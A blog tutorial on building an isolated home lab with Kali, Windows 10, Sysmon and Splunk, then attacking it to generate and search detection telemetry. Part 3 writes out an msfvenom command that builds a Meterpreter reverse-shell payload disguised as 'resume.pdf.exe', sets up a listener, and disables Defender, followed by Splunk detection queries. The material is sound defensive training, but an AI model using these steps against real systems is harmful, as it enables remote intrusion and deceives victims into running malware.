Building and Attacking a Home Lab: Kali Linux, Windows, and Splunk for Telemetry

Suhailmalik
7 min read · Jun 6, 2024


Image by clousecasia

Introduction

In this guide, we’ll walk you through setting up a home lab for cybersecurity learning and testing purposes. We’ll use Kali Linux for penetration testing, Windows for the target machine, Procmon for monitoring processes, and Splunk for log analysis.

Prerequisites

  • Basic knowledge of networking and operating systems
  • A computer with virtualization software (e.g., VMware, VirtualBox)
  • Internet connection

Step 1: Setting Up the Virtual Environment

Installing VirtualBox

  1. Download and install VirtualBox.
  2. Download the VirtualBox Extension Pack and install it.

Creating Virtual Machines

Setting Up Kali Linux VM

  1. Download Kali Linux Pre-Built VMs:
  • Visit the Kali Linux Downloads page.
  • Download the VirtualBox 64-bit image (or 32-bit if applicable to your system).

  2. Extract and Open in VirtualBox:
  • Use WinRAR or 7-Zip to extract the downloaded file if it’s in a compressed format.
  • Navigate to the extracted folder and double-click the .vbox file to open it in VirtualBox. This will import the VM automatically.

  3. Start the VM:
  • Open VirtualBox and start the Kali Linux VM.
  • Log in using the default credentials: Username: kali, Password: kali.

Windows 10 VM:

  1. Open another tab in your browser and search for “Windows 10 ISO Microsoft.”
  2. Click on the first link and navigate to the download page.
  3. Scroll down and click the “Download tool now” button.
  4. Download the Media Creation Tool and run it.
  5. Follow the prompts to create a Windows 10 ISO file.
  6. Save the ISO file to a location on your computer.

Create VM in VirtualBox:

  • Name: Windows 10
  • Type: Microsoft Windows, Version: Windows 10 (64-bit)
  • Allocate resources (e.g., 4 GB RAM, 1 CPU, 50 GB disk space).

Install Windows 10:

  • Load ISO, skip product key for trial, choose Windows 10 Pro, and follow installation steps.

Sysmon Setup:

Install and configure Sysmon on Windows 10 by following the separate article linked in the original post.

Splunk Enterprise Setup:

Install and configure Splunk Enterprise on Windows 10 by following the separate article linked in the original post.

Part 2: Configuring Network Settings in Virtual Machines

In this part, we will create an internal network between a Windows VM and a Kali VM, ensuring they are isolated from our host machine.

VirtualBox Configuration

1. Open VirtualBox Settings:

  • Launch VirtualBox and select your Windows VM.
  • Click on Settings and navigate to the Network section.

2. Set Up Internal Network:

  • In the Adapter 1 tab, choose Internal Network from the drop-down menu.
  • Name the network (e.g., “MyTestNetwork”).
  • Repeat these steps for the Kali VM, ensuring both VMs are connected to the same internal network.

3. Assign Static IPs:

Windows VM:

  • Start the Windows VM and open Network and Sharing Center.
  • Click on Change adapter settings, right-click Ethernet, and select Properties.
  • Select Internet Protocol Version 4 (TCP/IPv4) and click on Properties.
  • Choose Use the following IP address and set it to something like:
    • IP address: 192.168.20.10
    • Subnet mask: 255.255.255.0
  • Click OK to apply settings.
  • Check the new IP using ipconfig command.

Kali VM:

  • Start the Kali VM and right-click the Ethernet icon in the top bar.
  • Click Edit Connections.
  • Select Wired connection 1 under Ethernet and click the gear icon.
  • Under IPv4 Settings, set Method to Manual.
  • Add a custom IPv4 address (e.g., 192.168.20.11) and netmask (255.255.255.0), then save.
  • Run ifconfig in a terminal to check the new IP address.

4. Verify Connectivity:

  • From the Windows VM, open Command Prompt and ping the Kali VM: ping 192.168.20.11.
  • You will not be able to ping the Windows machine from Kali, because the Windows firewall blocks inbound ICMP echo requests by default.

Part 3: Attacking and Generating Telemetry in Your Home Lab

Preparing Kali Machine:

  • Note the IP address of your Kali machine using ifconfig or ip a.

Scanning with Nmap:

  • Use nmap -A -Pn <Windows IP> to scan the Windows machine.
  • Identify open ports (e.g., RDP port 3389).

Creating Malware with MSFVenom:

  • Use msfvenom to create a reverse TCP shell payload.
  • Command: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Kali IP> LPORT=4444 -f exe -o resume.pdf.exe.

Setting Up a Listener with Metasploit:

  • Open Metasploit using msfconsole command and use the multi-handler.
  • Set the payload to match the created malware, and use the options command to see the remaining parameters (LHOST, LPORT) that need to be set.
  • Start the handler to listen for incoming connections.

Serving Malware via HTTP:

  • Use Python to set up a simple HTTP server: python3 -m http.server 9999.
  • Ensure the Windows machine can download the malware from the Kali machine.

Executing Malware on Windows Machine:

  • Disable Windows Defender on the Windows machine.
  • Download and run the malware.
  • Verify the reverse shell connection with netstat -anob.

Handling the Reverse Shell on Kali:

  • Confirm the connection in Metasploit.
  • Execute commands (net user, net localgroup, ipconfig) to generate telemetry.

Configuring Splunk:

  • Ensure Splunk is ingesting Sysmon logs by configuring inputs.conf under Program Files\Splunk\etc\system\local\inputs.conf.
  • If there is no inputs.conf in the local folder, you may have to copy it from Program Files\Splunk\etc\system\default\inputs.conf.
  • Restart the Splunk services and create an index called endpoint.
  • To create the index, open Splunk > Settings > Indexes > New Index, name it endpoint, and save.
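An example local/inputs.conf stanza for this step (added here; it is not from the original post or the MyDFIR video). It assumes Sysmon writes to its default Microsoft-Windows-Sysmon/Operational channel and that Splunk Enterprise runs on the same Windows VM:

```ini
; Program Files\Splunk\etc\system\local\inputs.conf (path taken from the text above)
; Only this stanza is required in the local file; default\inputs.conf is left untouched.
[WinEventLog://Microsoft-Windows-Sysmon/Operational]
disabled = 0
index = endpoint
; Render events as XML so the Sysmon Data fields (Image, ParentImage, CommandLine,
; DestinationPort, ...) are extracted automatically. The source of the ingested
; events then becomes XmlWinEventLog:Microsoft-Windows-Sysmon/Operational.
renderXml = true
```

Create the endpoint index before restarting Splunk: events that arrive for an index that does not exist are dropped by the indexer rather than queued, so restarting first leaves a gap in the telemetry.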

Analyzing Telemetry in Splunk:

  • Use the Splunk search and reporting app to query index=endpoint.
  • You can install additional apps (such as the Sysmon add-on) to add more fields, such as parent_process_exec, for filtering logs.
  • Filter and analyze logs related to the generated telemetry.
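A search over the endpoint index that flags the telemetry generated in Part 3 (added here as an example; it is not part of the original post). It assumes the Sysmon channel is ingested as XML so that EventCode, Image, ParentImage, CommandLine and DestinationPort are extracted, and that the payload was built with the file name (resume.pdf.exe) and listener port (4444) used above:

```spl
index=endpoint source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" (EventCode=1 OR EventCode=3)
| eval indicator=case(
      EventCode=3 AND tonumber(DestinationPort)=4444,          "outbound connection to the listener port",
      EventCode=1 AND match(ParentImage, "(?i)\\.pdf\\.exe$"), "process spawned by a double-extension binary",
      EventCode=1 AND match(Image, "(?i)\\\\net1?\\.exe$"),     "net.exe/net1.exe account enumeration",
      true(), null())
| where isnotnull(indicator)
| table _time host EventCode indicator ParentImage Image CommandLine DestinationIp DestinationPort
| sort _time
```

Event ID 3 rows show the reverse shell connecting back to the Kali IP, and Event ID 1 rows show cmd.exe and net.exe/net1.exe being launched underneath resume.pdf.exe when net user and net localgroup are run through the Meterpreter session.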

Conclusion:

This article demonstrates how to generate telemetry from attacks to better understand and detect malicious activities. Continue to explore and experiment in your lab to enhance your skills.

If you have any issues or questions, let me know in the comments below.

Credits:

This article is based on the instructional video from the MyDFIR YouTube channel.
